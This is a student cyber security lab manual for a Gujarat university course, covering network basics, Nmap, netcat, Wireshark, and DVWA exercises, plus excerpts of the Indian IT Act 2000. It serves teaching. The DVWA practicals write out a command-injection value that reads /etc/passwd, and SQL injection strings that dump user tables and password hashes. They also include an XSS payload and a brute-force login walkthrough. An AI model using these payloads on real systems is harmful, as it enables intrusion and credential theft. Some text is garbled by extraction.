50% found this document useful (2 votes)
4K views73 pages

Cyber Security Lab Manual

Here are the key points about LAN: - LAN connects computers and devices within a small geographic area like a home, office, or building. - Uses high-speed connections like Ethernet cables, switches, and wireless access points. - Private IP addressing scheme allows unique identification of devices on the LAN. - Fast data transmission speeds up to 1000 Mbps (1 Gbps). - Covers short distances of up to a few kilometers. - Privately owned and maintained network. - Common media include twisted pair cables, coaxial cables, and wireless. - Fault tolerance is high due to small size and redundancy. So in summary, a LAN connects
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
50% found this document useful (2 votes)
4K views73 pages

Cyber Security Lab Manual

Here are the key points about LAN: - LAN connects computers and devices within a small geographic area like a home, office, or building. - Uses high-speed connections like Ethernet cables, switches, and wireless access points. - Private IP addressing scheme allows unique identification of devices on the LAN. - Fast data transmission speeds up to 1000 Mbps (1 Gbps). - Covers short distances of up to a few kilometers. - Privately owned and maintained network. - Common media include twisted pair cables, coaxial cables, and wireless. - Fault tolerance is high due to small size and redundancy. So in summary, a LAN connects
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 73

Silver Oak College of Engineering

& Technology

GUJARAT TECHNOLOGICAL UNIVERSITY


BACHELOR OF ENGINEERING

CYBER SCEURITY
(3150714)

5th SEMESTER

COMPUTER ENGINEERING

Laboratory Manual
DEPARTMENT OF COMPUTER ENGINEERING
VISION

To be recognized for the quality education and research in the field of Computer Engineering known
for its accomplished graduates.

MISSION
1. Continually improve the standard of our graduates by engaging in innovative teaching learning
methods with high caliber motivated faculty members keeping in-line with the rapid
technological advancements.
2. Promote and support research activities over a wide range of academic interests among students
and staff for growth of individual knowledge and continuous learning.
3. Provide an education system that promotes innovation, creativity, entrepreneurial spirit,
leadership as well as freedom of thought with emphasis on professionalism and ethical behavior.

PROGRAM EDUCATIONAL OBJECTIVES (PEO):

PEO1: To provide fundamental knowledge of science and engineering for an IT professional and
to equip them with proficiency of mathematical foundations and algorithmic principles and inculcate
competent problem-solving ability.

PEO2: To implant ability in creativity & design of IT systems and transmit knowledge and
skills to analyze, design, test and implement various software applications.

PEO3: To exhibit leadership capability, triggering social and economical commitment and
inculcate community services.

PEO4: To inculcate professional-social ethics, teamwork in students and acquaint them with
requisite technical and managerial skills to attain a successful career.

I
PROGRAM OUTCOMES (POs)
Engineering Graduates will be able to:

1. Engineering knowledge: Apply the knowledge of mathematics, science, engineering


fundamentals, and an engineering specialization to the solution of complex engineering
problems.
2. Problem analysis: Identify, formulate, review research literature, and analyze complex
engineering problems reaching substantiated conclusions using first principles of mathematics,
natural sciences, and engineering sciences.
3. Design/development of solutions: Design solutions for complex engineering problems and
design system components or processes that meet the specified needs with appropriate
consideration for the public health and safety, and the cultural, societal, and environmental
considerations.
4. Conduct investigations of complex problems: Use research-based knowledge and research
methods including design of experiments, analysis and interpretation of data, and synthesis of
the information to provide valid conclusions.
5. Modern tool usage: Create, select, and apply appropriate techniques, resources, and modern
engineering and IT tools including prediction and modeling to complex engineering activities
with an understanding of the limitations.
6. The engineer and society: Apply reasoning informed by the contextual knowledge to assess
societal, health, safety, legal and cultural issues and the consequent responsibilities relevant to
the professional engineering practice.
7. Environment and sustainability: Understand the impact of the professional engineering
solutions in societal and environmental contexts, and demonstrate the knowledge of, and need
for sustainable development.
8. Ethics: Apply ethical principles and commit to professional ethics and responsibilities and
norms of the engineering practice.
9. Individual and team work: Function effectively as an individual, and as a member or leader
in diverse teams, and in multidisciplinary settings.
10. Communication: Communicate effectively on complex engineering activities with the

II
engineering community and with society at large, such as, being able to comprehend and write
effective reports and design documentation, make effective presentations, and give and receive
clear instructions.
11. Project management and finance: Demonstrate knowledge and understanding of the
engineering and management principles and apply these to one’s own work, as a member and
leader in a team, to manage projects and in multidisciplinary environments.
12. Life-long learning: Recognize the need for, and have the preparation and ability to engage in
independent and life-long learning in the broadest context of technological change.

III
CYBER SECURITY PRACTICAL BOOK

DEPARTMENT OF COMPUTER

ENGINEERING PREFACE

It gives us immense pleasure to present the first edition of Cyber Security Practical Book for the
B.E. 3rd year students of Silver Oak College of Engineering and Technology.

The theory and laboratory course of Cyber Security, at Silver Oak College of Engineering
and Technology, Ahmedabad, is designed in such a manner that students can develop the
basic understanding of the subject during theory classes and gain the hands-on practical
experience during their laboratory sessions.

The Laboratory Manual presented here to you help you in understanding Topologies of
network,, security related network and understanding of different tools for different attacks on
security. It also take you in learning various hacking techniques. It will help you in learning
Linux programming which will be very useful programming language in Cyber Security.

Lab Manual Revised by: Prof. Shital Mehta, Silver Oak College of Engineering and

Technology

Prof. Nirav Shah, Silver Oak College of Engineering and

Technology

Prof. Hardika Menghani, Aditya Silver Oak Institute of

Technology

Lab Manual Revision No.: SOCET_3150714_LM_2020_1

IV
CERTIFICATE
SHAIKH
This is to certify that Mr. ANNANAHMED with enrollment no.190770107264
180770107508 from
FURKANAHMED

Semester 5-DIV-A has successfully completed his/her laboratory experiments in

the Cyber Security(3150714) from the department of Computer Engineering during

the academic year 2020


2021-22

Date of Submission: ......................... Staff Incharge: ...........................

Head of Department: ...........................................

V
VI
TABLE OF CONTENT

Sr
Practical Aim To From
No
1 2
1. To study about Basic concepts of Computer Networks. (Devices,
LAN, MAN & WAN)
2. To study about Network Topologies. 3 9

3. TCP Scanning using NMAP. 10 13

4. UDP Port Scanning Using NMAP. 14 16


5. TCP/UDP Connectivity using NETCAT. 17 20
21 27
6. Web Application Testing using DVWA.
28 36
7. SQL Injection using DVWA.
37 40
8. Analyze the Network Traffic using Wireshark.
41 54
9. The Practice of Web Application Penetration Testing.
55 64
10. Case Study on Indian IT ACT 2000.

VI
I
PRACTICAL: 1

AIM: To study about Basic concepts of Computer Networks. (Devices, LAN, MAN & WAN,
O.S)

Introduction

Local Area Network (LAN) –

LAN or Local Area Network connects network devices in such a way that personal computer and
workstations can share data, tools and programs. The group of computers and devices are connected
together by a switch, or stack of switches, using a private addressing scheme as defined by the
TCP/IP protocol. Private addresses are unique in relation to other computers on the local network.
Routers are found at the boundary of a LAN, connecting them to the larger WAN.
Data transmits at a very fast rate as the number of computers linked are limited. By definition, the
connections must be high speed and relatively inexpensive hardware (Such as hubs, network adapters
and Ethernet cables). LANs cover smaller geographical area (Size is limited to a few kilometres) and
are privately owned. One can use it for an office building, home, hospital, schools, etc. LAN is easy
to design and maintain. A Communication medium used for LAN has twisted pair cables and coaxial
cables. It covers a short distance, and so the error and noise are minimized.
Early LAN’s had data rates in the 4 to 16 Mbps range. Today, speeds are normally 100 or 1000 Mbps.
Propagation delay is very short in a LAN. The smallest LAN may only use two computers, while
larger LANs can accommodate thousands of computers. A LAN typically relies mostly on wired
connections for increased speed and security, but wireless connections can also be part of a LAN. The
fault tolerance of a LAN is more and there is less congestion in this network. For example: A bunch
of students playing Counter Strike in the same room (without internet).
Metropolitan Area Network (MAN) –

MAN, or Metropolitan area Network covers a larger area than that of a LAN and smaller area as
compared to WAN. It connects two or more computers that are apart but resides in the same or
different cities. It covers a large geographical area and may serve as an ISP (Internet Service
Provider). MAN is designed for customers who need a high-speed connectivity. Speeds of MAN
ranges in terms of Mbps. It’s hard to design and maintain a Metropolitan Area Network.

The fault tolerance of a MAN is less and also there is more congestion in the network. It is costly and
may or may not be owned by a single organization. The data transfer rate and the propagation delay of
MAN is moderate. Devices used for transmission of data through MAN are: Modem and Wire/Cable.
Examples of a MAN are the part of the telephone company network that can provide a high-speed
DSL line to the customer or the cable TV network in a city.
Wide Area Network (WAN) –

WAN or Wide Area Network is a computer network that extends over a large geographical area,
1
although it might be confined within the bounds of a state or country. A WAN could be a connection
of LAN connecting to other LAN’s via telephone lines and radio waves and may be limited to an
enterprise (a corporation or an organization) or accessible to the public. The technology is high speed
and relatively expensive.
There are two types of WAN: Switched WAN and Point-to-Point WAN. WAN is difficult to design
and maintain. Similar to a MAN, the fault tolerance of a WAN is less and there is more congestion in
the network. A Communication medium used for WAN is PSTN or Satellite Link. Due to long
distance transmission, the noise and error tend to be more in WAN.
WAN’s data rate is slow about a 10th LAN’s speed, since it involves increased distance and increased
number of servers and terminals etc. Speeds of WAN ranges from few kilobits per second (Kbps) to
megabits per second (Mbps). Propagation delay is one of the biggest problems faced here. Devices
used for transmission of data through WAN are: Optic wires, Microwaves and Satellites. Example of
a Switched WAN is the asynchronous transfer mode (ATM) network and Point-to-Point WAN is dial-
up line that connects a home computer to the Internet.
Os-:
An operating system (OS) is basically a collection of software that manages computer hardware
resources and provides common services for computer programs. Operating system is a crucial
component of the system software in a computer system.
Network Operating System is one of the important type of operating system.
Network Operating System runs on a server and gives the server the capability to manage data, users,
groups, security, applications, and other networking functions. The basic purpose of the network
operating system is to allow shared file and printer access among multiple computers in a network,
typically a local area network (LAN), a private network or to other networks.
Some examples of network operating systems include Microsoft Windows Server 2003, Microsoft
Windows Server 2008, UNIX, Linux, Mac OS X, Novell NetWare, and BSD.

Advantages
 Centralized servers are highly stable.
 Security is server managed.
 Upgradation of new technologies and hardware can be easily integrated into the system.
 It is possible to remote access to servers from different locations and types of systems.

Disadvantages
 High cost of buying and running a server.
 Dependency on a central location for most operations.
 Regular maintenance and updates are required.

2
PRACTICAL: 2

AIM: To study about Network Topologies.

Network Topology
Computer network topology is the way various components of a network (like nodes, links,
peripherals, etc.) are arranged. Network topologies define the layout, virtual shape or structure of
network, not only physically but also logically. The way in which different systems and nodes are
connected and communicate with each other is determined by topology of the network. Topology
can be physical or logical.
Physical Topology is the physical layout of nodes, workstations and cables in the network; while
logical topology is the way information flows between different components.

Types of Physical Network Topologies:

 Bus Topology
 Star Topology
 Ring Topology
 Mesh Topology
 Tree Topology

1. Bus Topology

Bus Topology is the simple stofnetwork topologies. Inthistypeoftopology, allthenodes (computers as


well as servers) are connected to the single cable (called bus), by the help of interface connectors.
This central cable is the backbone of the network and is known as Bus (thus the name). Every
workstation communicates with the other device through this Bus.

A signal from the source is broadcasted and it travels to all workstations connected to bus cable.
Although the message is broadcasted but only the intended recipient, whose MAC address or IP
address matches, accepts it. If the MAC /IP address of machine doesn’t match with the intended
address, machine discards the signal.

3
Aterminatorisaddedat endsofthecentralcable, topreventbouncingofsignals. Abarrelconnector can be
used to extend it. Below I have given a basic diagram of a bus topology and then have discussed
advantages and disadvantages of Bus Network Topology.

Advantages of Bus Topology

 Easy to connect a computer or peripheral to a linear bus.


 Requires less cable length than a star topology.

Disadvantages of Bus Topology

 Entire network shuts down if there is a break in the main cable.


 Terminators are required at both ends of the backbone cable.
 Difficult to identify the problem if the entire network shutdown.
 Not meant to be used as a stand-alone solution
2. Star Topology

In Star topology, all the components of network are connected to the central device called “hub”
whichmaybeahub,arouteroraswitch.UnlikeBustopology(discussedearlier),wherenodeswere
connected to central cable, here all the workstations are connected to central device with a point-to-
point connection. So it can be said that every computer is indirectly connected to every other node
by the help of “hub”.

4
All the data on the star topology passes through the central device before reaching the intended
destination.HubactsasajunctiontoconnectdifferentnodespresentinStarNetwork,andatthesame
timeitmanagesandcontrolswholeofthenetwork.Dependingonwhichcentraldeviceisused,“hub”
canactasrepeaterorsignalbooster.Centraldevicecanalsocommunicatewithotherhubsofdifferent
network. Unshielded Twisted Pair (UTP) Ethernet cable is used to connect workstations to central
node.

Advantages of Star Topology:

 Less damage in case of a single computer failure as it does not affect the entire network

Disadvantages of Star topology:

 Morecablesarerequiredtobeconnectedbecauseeachcomputerindividuallyconnectstothe central
server
 Single point of failure in case the server letdown.
3. Ring Topology

In Ring Topology, all the nodes are connected to each-other in such a way that they make a closed
loop. Each workstation is connected to two other components on either side, and it communicates
with these two adjacent neighbors. Data travels around the network, in one direction. Sending and
receiving of data takes place by the help of TOKEN.

5
Token passing (in brief): Token contains a piece of information which along with data is sent by the
source computer. This token then passes to next node, which checks if the signal is intended to it. If
yes, it receives it and passes the empty to into the network, otherwise passes token along with the
data to next node. This process continues until the signal reaches its intended destination.
The nodes with token are the ones only allowed to send data. Other nodes have to wait for an empty
token to reach them. This network is usually found in offices, schools and small buildings.

Advantages of Ring topology:

 Reducedchancesofdatacollisionaseachnodereleaseadatapacketafterreceivingthetoken.
 Token passing makes ring topology perform better than bus topology under heavy traffic
 No need of server to control connectivity among the nodes
 Equal access to the resources

Disadvantages of Ring topology:

 In Unidirectional Ring, a data packet must pass through all the nodes.
Ex:Let’ssayA,B,C,D,andEareapartoftheringnetwork.ThedataflowisfromAtowards
Bandhenceforth.Inthiscondition,ifEwantstosendapackettoD,thepacketmusttraverse the entire
network to reach.
 Single point of failure that means if a node goes down entire network goes down.

4. Mesh Topology

6
In a mesh network topology, each of the network node, computer and other devices, are
interconnectedwithoneanother.Everynodenotonlysendsitsownsignalsbutalsorelaysdatafrom other
nodes. In fact a true mesh topology is the one where every node is connected to every other node in
the network. This type of topology is very expensive as there are many redundant connections, thus
it is not mostly used in computer networks. It is commonly used in wireless networks. Flooding or
routing technique is used in mesh topology.

Types of Mesh Network topologies: -

a. Full Mesh Topology: - In this, like a true mesh, each component is connected to every other
component. Even after considering the redundancy factor and cost of this network, its main
advantage is that the network traffic can be redirected to other nodes if one of the nodes goes
down. Full mesh topology is used only for backbone networks.

b. PartialMeshTopology:-Thisisfarmorepracticalascomparedtofullmeshtopology.Here,some of the
systems are connected in similar fashion as in mesh topology while rests of the systems are
onlyconnectedto1or2devices.Itcanbesaidthatinpartialmesh,theworkstationsareindirectly
connected to other devices. This one is less costly and also reduces redundancy.

Advantages of mesh topology:

 Each connection can carry its own data load


 It is robust
 A fault is diagnosed easily

7
 Provides security and privacy

Disadvantages of mesh topology:

 Installation and configuration are difficult if the connectivity gets more


 Cabling cost is more and the most in case of a fully connected mesh topology
 Bulk wiring is required

5. Tree Topology

Tree Topology integrates the characteristics of Star and Bus Topology. Earlier we saw how in
PhysicalStarnetworkTopology,computers(nodes)areconnectedbyeachotherthroughcentralhub.

InTreeTopology,thenumberofStarnetworksareconnectedusingBus.Thismaincableseemslike a main
stem of a tree, and other star networks as the branches. It is also called Expanded Star Topology.
Ethernet protocol is commonly used in this type of topology. The diagram below will make it clear.

Advantages of tree topology:

 Scalable as leaf nodes can accommodate more nodes in the hierarchical chain.
 A point to point wiring to the central hub at each intermediate node of a tree topology
represents a node in the bus topology
 Other hierarchical networks are not affected if one of them gets damaged

8
 Easier maintenance and faultfinding

Disadvantages of tree topology:

 Huge cabling is needed


 A lot of maintenance is needed
 Backbone forms the point of failure.

6. Hybrid Topology

Hybrid, as the name suggests, is mixture of two different things. Similarly, in this type of topology
we integrate two or more different topologies to form a resultant topology which has good points
optimizing the available resources. Special care can be given to nodes where traffics high as well as
where chances of fault are high.

9
PRACTICAL: 3

AIM: TCP Scanning using NMAP.

Nmap is a tool used for port scanning. It scans the open ports in the target
host. Step 1: Install the nmap.exe.
Step 2: Start Nmap.
Following is the GUI of Nmap.

Put Screenshot of Nmap Home Screen:

Step 3: Set the IP address of the target


Step 4: Choose the scan type

10
Put Screenshot of Choose the scan:

Step 5:Click scan


Result Analysis
Nmap Output
11
Screenshot:

12
Ports:

Host Details:

13
PRACTICAL: 4

AIM: UDP Port Scanning Using NMAP.

Step 1: Install the nmap.exe.


Step 2: Start Nmap.
Following is the GUI of Nmap.
Put Screenshot of Nmap Home Screen:

Step 3: Set the IP address of the target


Step 4: Choose the scan type.

14
Put Screenshot of Choose the scan:

Step 5: Click scan


Result Analysis
Nmap Output:

15
Ports:

16
PRACTICAL: 5

AIM: TCP/UDP Connectivity using NETCAT.

netcat = net+cat.

It is cat command over the network. Mostly used for file transfer over the network. Learn basic
unix/linux commands to understand working of this tool.

Step 1: Install the ncat. Sometimes it comes with nmap package so check it before installing a fresh
package.

Step 2: Start ncat by going to ncat folder in cmd.

To show the TCP connection we need to maintain a client-server session

Step 3: Open two 'cmd' windows in administrator mode

17
Step 4: Goto the folder where ncat.exe is installed (in both the windows).

Step 5: Run the command: ncat.exe -l 4444

18
Here -l sets ncat to listen at port number 4444

Step 6: On the second cmd (client window) run the command: ncat.exe 127.0.0.1 4444

127.0.0.1 is the local ip address. The address of same PC, and 4444 is the port number where ncat is
listening. To practice the practical in the lab enter your neighbour's IP address, and choose any port
number greater than 1024.

Step 7: Now type the message which is to be sent on the server. As soon as you press the enter key,
the message is sent to the server and it is displayed on the server cmd window.

19
Step 8: Now the connection has made. To disconnect the connection press ctrl+c.

Step 9: To transfer any file type on the server side:

ncat.exe -l 4444 > input.txt

on the client window:

ncat.exe 127.0.0.1 4444 < output.txt

20
PRACTICAL: 6

AIM: Web Application Testing using DVWA.

Step 1: Install DVWA Tool.

Step 2: Login to DVWA.

Step 3: Set DVWA Security Level

1. Click on DVWA Security, in the left hand menu.

2.Select "low"

3.Click Submit

21
Step 4: Command Execution.

1. Click on Command Execution

22
Step 5: Execute Ping

1. Below we are going to do a simply ping test using the web interface.
2. As an example, ping something on your network.
3. Use the IP Address 192.168.1.106
4. Click Submit.

23
Attempt 1

1. 192.168.1.106; cat /etc/passwd


2. Click Submit
3. Notice that we are now able to see the contents of the /etc/passwd file

24
Step 6: Bring up a terminal window.

1. cat /var/www/html/dvwa/vulnerabilities/exec/source/low.php.
2. Notice the two shell_exec lines.
3. These are the lines that execute ping depending on which Operating System is being used.
4. In Unix/Linux command, you can run multiple command separated by a ";".
5. Notice the code does not check that if $target matches an IP Address
6. \d+.\d+.\d+.\d+, where "\d+" represents a number with the possibility of multiple digits,
like 192.168.1.106.
7. The code allows for an attacker to append commands behind the IP Address.
8. 192.168.1.106; cat /etc/passwd

25
Step 7: Copy the /etc/passwd file to /tmp.

192.168.1.106; cat /etc/passwd | tee /tmp/passwd

26
27
PRACTICAL: 7

AIM: Manual SQL Injection using DVWA

Step 1: Install DVWA Tool

Step 2: Login to DVWA

Step 3: Select Security Level

28
29
Step 4: Select "SQL Injection" from the left navigation menu.

30
Step 5:

 Input the below text into the User ID Textbox (See Picture).
 %' or '0'='0 and click submit.
 In this scenario, we are saying display all record that are false and all records that are true.
 %' - Will probably not be equal to anything, and will be false.
 '0'='0' - Is equal to true, because 0 will always equal 0.

31
Step 6:
 Input the below text into the User ID Textbox (See Picture).
 %' or 0=0 union select null, version() #.
 Notice in the last displayed line, 5.1.60 is displayed in the surname.
 This is the version of the mysql database.

32
Step 7: Display Database User
 Input the below text into the User ID Textbox (See Picture).
 %' or 0=0 union select null, user() #
 Notice in the last displayed line, root@localhost is displayed in the surname.
 This is the name of the database user that executed the behind the scenes PHP code

33
Step 8: Display all tables in information schema
 Input the below text into the User ID Textbox (See Picture).
 %' and 1=0 union select null, table name from information_schema. tables #
 Click Submit
 Now we are displaying all the tables in the information schema database.
 The INFORMATION_SCHEMA is the information database, the place that stores
information about all the other databases that the MySQL server maintains.

34
Step 9: Display all the user tables in information schema.
 Input the below text into the User ID Textbox (See Picture).
 %' and 1=0 union select null, table name from information_schema.tables where table name
like 'user%'#
 Click Submit
 Now we are displaying all the tables that start with the prefix "user" in the information
schema database.

Step 10: Display all the columns fields in the information schema user table
 Input the below text into the User ID Textbox (See Picture).%' and 1=0 union select null,
concept(table_name,0x0a,column_name) from information_schema.columns where table
name = 'users' #
 Click Submit

 Now we are displaying all the columns in the users table.

 Notice there are a user_id, first name, last name, user and Password column.

35
Step 11: Display all the columns field contents in the information_schema user table
 Input the below text into the User ID Textbox (See Picture).
 %' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password)
from users #
 Click Submit
 Now we have successfully displayed all the necessary authentication information into this
database.

36
PRACTICAL: 8

AIM: Analyze the Network Traffic using Wireshark. (Network Sniffer)

A packet sniffer, sometimes referred to as a network monitor or network analyzer, can be used
byanetworkor system administrator to monitor and troubleshoot network traffic. Using the
information captured by the packet sniffer an administrator can identify erroneous packets and use
the data to pinpoint bottlenecks and help maintain efficient network data transmission.

In its simple form a packet sniffer simply captures all of the packets of data that pass through given
network interface. By placing packet sniffer on networking promiscuous mode, a malicious intruder
can capture and analyze all of the network traffic.

This is basically a network protocol analyzer –popular for providing the minutest details about your
network protocols, packet information, decryption etc. It can be used on Windows, Linux, OS X,
Solaris, FreeBSD, NetBSD, and many other systems. The information that is retrieved via this tool
can be viewed through a GUI, or the TTY-mode TShark utility. You can get your own free version
of the tool from here.

Download and install Wireshark network analyzer.

Steps to capture traffic:


1. Open Wiresharknetworkanalyzer

37
2. Select interface: Got capture option in menu bar and select interface

38
39
3. Start Capturing

40
PRACTICAL: 9

Aim: The Practice of Web Application Penetration Testing.

1. Building Testing Environment

Intrusion of websites is illegal in many countries, so you cannot take other’s web sites as your testing
target.
First, you need build a test environment for yourself. If you are not good at building servers, we
recommend you build a simple one with XAMPP.
OS: Windows 7, 8
Software: XAMPP for Windows, download:
https://www.apachefriends.org/zh_cn/index.html

XAMPP for Windows has modules such as Apache, PHP, Tomcat, and MySQL etc. The default
installation path is c:\xampp, please do not change it.

Take DVWA (Damn Vulnerable Web Application) as an example, Start Apache and MySQL, and

41
access with http://127.0.0.1 .
After started, you can use the following command to set the password to 123456 (This is a weak
password, just for example, please modify it)
C:\xampp\mysql\bin\mysqladmin -u root password 123456
Now, you can download DVWA from https://github.com/RandomStorm/DVWA , unzip it to
C:\xampp\htdocs\dvwa,
Then modify its configuration file, which is
C:\xampp\htdocs\dvwa\config\config.inc.php:
$_DVWA[ 'db_server' ] = 'localhost';
$_DVWA[ 'db_database' ] = 'dvwa';
$_DVWA[ 'db_user' ] = 'root'
$_DVWA[ 'db_password' ] = ‘123456’;
$_DVWA['default_security_level']=" low";
Open http://127.0.0.1/dvwa/setup.php
Click” Create/Reset Database” to finish the installation.
Access the front page of it and it will redirect to
http://127.0.0.1/DVWA/login.php

Now, a basic test environment is available.

42
2. DVWA Brute Force
The first challenge of DVWA is how to login it. Usually, you can search the network and get the
default username/password, or try to use SQL Injection to escape the authentication mechanism, such
as use a username like admin’;-- or other ways.
Here we will use brute force, and use WebCruiser Web Vulnerability Scanner 3
(http://www.janusec.com/ ) as a brute force tool.
First, input any username and password, such as 123, 456, etc. submit.

Switch to Resend tab:

43
We found there was a request list which includes requests we submit just now. Note that there is a
button “Bruter”, click it, it will switch to Bruter tool.
The username and password field has been identified automatically.
The dictionary files are located in the same directory with WebCruiserWVS.exe and supports custom
modifying.

Click “Go” to start guess process, result will be list in the window.
Log in with the username and password.
3. SQL Injection
Select “SQL Injection” menu, input 1 and submit:

44
Input 1’ to try:

MySQL throw exception because of unpaired single quotes.


Now, we can suspect that there is SQL Injection vulnerability here. Continue try 1 and 1=1 and 1 and
1=2

But we found it is not the same as expected, SQL Injection with integer type was ruled out. Continue
try with 1' and '1'='1 and 1' and '1'='2

45
46
There is no result return to us when we input 1’ and ‘1’=’2

Till now, we can adjudge there is SQL Injection vulnerability with string type here. Recap:
Criterion of SQL Injection
Assume the initial response is Response0, Response by append true logic is Response1, Response by
append false logic is Response2,

47
If Response1= Response0, but Response1! = Response2, SQL Injection exists. OK, can you takeover
some data by exploiting it?
Try: http://127.0.0.1/dvwa/vulnerabilities/sqli/?Submit=Submit&id=1' and (select 1 from ( select
count(*),concat((select database()),0x3a,floor(rand(0)*2)) x from information_schema.tables group
by x)a)%23

Well, the database name “dvwa” returns on the page.


This case is a little complex; actually it builds an exception intentionally by twice rand
computation.
Another way is blind SQL Injection, by guest the length and ASCII of each byte of the field. To
compute if the length of database name bigger than 10:
http://127.0.0.1/dvwa/vulnerabilities/sqli/?Submit=Submit&id=1' and (select
char_length(database()))>10 and '1'='1

Right, continue guess till:


http://127.0.0.1/dvwa/vulnerabilities/sqli/?Submit=Submit&id=1' and (select
char_length(database()))=4 and '1'='1

We got the length is 4.


Continue to guess each byte of it:
http://127.0.0.1/dvwa/vulnerabilities/sqli/?Submit=Submit&id=1' and (select
ord(substr(database(),1,1)) )=100 and %271%27=%271

48
49
50
The ASCII of the first byte is 100, it is d, and so on.
http://127.0.0.1/dvwa/vulnerabilities/sqli/?Submit=Submit&id=1' and (select
sord(substr(database(),2,1)) )=118 and %271%27=%271 , the second byte is v .
http://127.0.0.1/dvwa/vulnerabilities/sqli/?Submit=Submit&id=1' and (select
ord(substr(database(),3,1)) )=119 and %271%27=%271 ,the third byte is w .
http://127.0.0.1/dvwa/vulnerabilities/sqli/?Submit=Submit&id=1' and (select

ord(substr(database(),4,1)) )=97 and %271%27=%271 ,the fourth byte is a . Got the full name of
database is “dvwa” .
Is there a tool which can do these tests instead?
Yes, we can use a web application security scanner to do it.
Take WebCruiser as an illustration, navigate page and click “ScanURL”:

51
SQL Injection vulnerabilities found. Right click vulnerability and select “SQL INJECTION POC”,
Continue click ”Get Environment Information”:

52
4. XSS
Select XSS from the menu, http://127.0.0.1/dvwa/vulnerabilities/xss_s/

Input text and script directly in the title and content field, such as:
testinput<img src=0 onerror="alert(123456)"> Or use scanner, it found 2 XSS vulnerabilities.

53
Note: In order to improve efficiency, WebCruiser Web Vulnerability Scanner can scan designated
vulnerability type (setting) or designated URL (ScanURL button) separately.

54
PRACTICAL: 10

AIM: Case Study on Indian IT ACT 2000.

An Act to provide legal recognition for transactions carried out by means of electronic data
interchange and other means of electronic communication, commonly referred to as "electronic
commerce", which involve the use of alternatives to paper-based methods of communication and
storage of information, to facilitate electronic filing of documents with the Government agencies.

Some IT Acts with section are described below.

43. Penalty for damage to computer, computer system, etc.

If any person without permission of the owner or any other person who is in charge of a computer,
computer system or computer network, —

(a) Accesses or secures access to such computer, computer system or computer network;

(b) Downloads, copies or extracts any data, computer data base or information from such computer,
computersystemorcomputernetworkincludinginformationordataheldorstoredinanyremovable storage
medium;

(c) Introduces or causes to be introduced any computer contaminant or computer virus into any
computer, computer system or computer network;

(d) damages or causes to be damaged any computer, computer system or computer network, data,
computer data base or any other programmer residing in such computer, computer system or
computer network;

(e) Disrupts or causes disruption of any computer, computer system or computer network;

(f) Denies or causes the denial of access to any person authorized to access any computer, computer
system or computer network by any means;

(g) providesanyassistancetoanypersontofacilitateaccesstoacomputer,computersystemor

55
computer network in contravention of the provisions of this Act, rules or regulations made
thereunder;

(h) chargestheservicesavailedofbyapersontotheaccountofanotherpersonbytamperingwithor
manipulatinganycomputer,computersystem,orcomputernetwork,heshallbeliabletopaydamages by
way of compensation not exceeding one crore rupees to the person so affected. Explanation.- For
the purposes of this section,—

(i) "Computer contaminant" means any set of computer instructions that are designed—

(a) To modify, destroy, record, transmit data or Programmed residing within a computer, computer
system or computer network; or

(b) By any means to usurp the normal operation of the computer, computer system, or computer
network;

(ii) "computer data base" means a representation of information, knowledge, facts, concepts or
instructionsintext,image,audio,videothatarebeingpreparedorhavebeenpreparedinaformalized manner
or have been produced by a computer, computer system or computer network and are intended for
use in a computer, computer system or computer network;

(iii) "computervirus"meansanycomputerinstruction,information,dataorProgrammethatdestroys,
damages, degrades or adversely affects the performance of a computer resource or attaches itself to
another computer resource and operates when a Programmed, data or instruction is executed or
some other event takes place in that computer resource;

(iv) "Damage" means to destroy, alter, delete, add, modify or rearrange any computer resource by
any means.

44. Penalty for failure to furnish information returned.

If any person who is required under this Act or any rules or regulations made thereunder to—

(a) furnishanydocument,returnorreporttotheControlleror?heCertifyingAuthorityfailstofurnish

56
the same, he shall be liable to a penalty not exceeding one lakh and fifty thousand rupees for each
such failure;

(b) File any return or furnish any information, books or other documents within the time specified
therefor in the regulations fails to file return or furnish the same within the time specified therefore
theregulations,heshallbeliabletoapenaltynotexceedingfivethousandrupeesforeverydayduring which
such failure continues;

(c) Maintain books of account or records, fails to maintain the same, he shall be liable to a penalty
not exceeding ten thousand rupees for every day during which the failure continues.

52. Salary, allowances and other terms and conditions of service of Presiding Officer.

The salary and allowances payable to, and the other terms and conditions of service including
pension, gratuity and other retirement benefits of. The Presiding Officer of Cyber Appellate
Tribunal shall be such as may be prescribed: Provided that neither the salary and allowances nor the
other terms and conditions of service of the Presiding Officer shall be varied to his disadvantage
after appointment.

61. Civil court not to have jurisdiction.

No court shall have jurisdiction to entertain any suit or proceeding in respect of any matter which
an adjudicating officer appointed under this Act or the Cyber Appellate Tribunal constituted under
this Act is empowered by or under this Act to determine and no injunction shall be granted by any
court or other authority in respect of any action taken or to be taken in pursuance of any power
conferred by or under this Act.

62. Appeal to HighCourt.

Any person aggrieved by any decision or order of the Cyber Appellate Tribunal may file an appeal
to the High Court within sixty days from the date of communication of the decision or order of the
Cyber Appellate Tribunal to him on any question of fact or law arising out of such order Provided
that the High Court may, if it is satisfied that the appellant was prevented by sufficient cause from
filingtheappealwithinthesaidperiod,allowittobefiledwithinafurtherperiodnotexceedingsixty

57
days.

64. Recovery of penalty

ApenaltyimposedunderthisAct,ifitisnotpaid,shallberecoveredasanarrearoflandrevenueand
thelicenseortheDigitalSignatureCertificate,asthecasemaybe,shallbesuspendedtillthepenalty is paid.

65. Tampering with computer source documents.

Who ever knowing lyorintentionallyconceals,destroysoraltersorintentionallyorknowinglycauses


another to conceal, destroy or alter any computer source code used for a computer, computer
Programme,computersystemorcomputernetwork,whenthecomputersourcecodeisrequiredtobe kept or
maintained by law for the time being in force, shall be punishable with imprisonment up to three
years, or with fine which may extend up to two lakh rupees, or with both.

Explanation.—for the purposes of this section, "computer source code" means the

Listingofprogrammer,computercommands,designandlayoutandProgrammeanalysisofcomputer
resource in any form.

66. Hacking with computer system.

(1) Whoever with the intent to cause or knowing that he is likely to cause wrongful loss or damage
to the public or any person destroys or deletes or alters any information residing in a computer
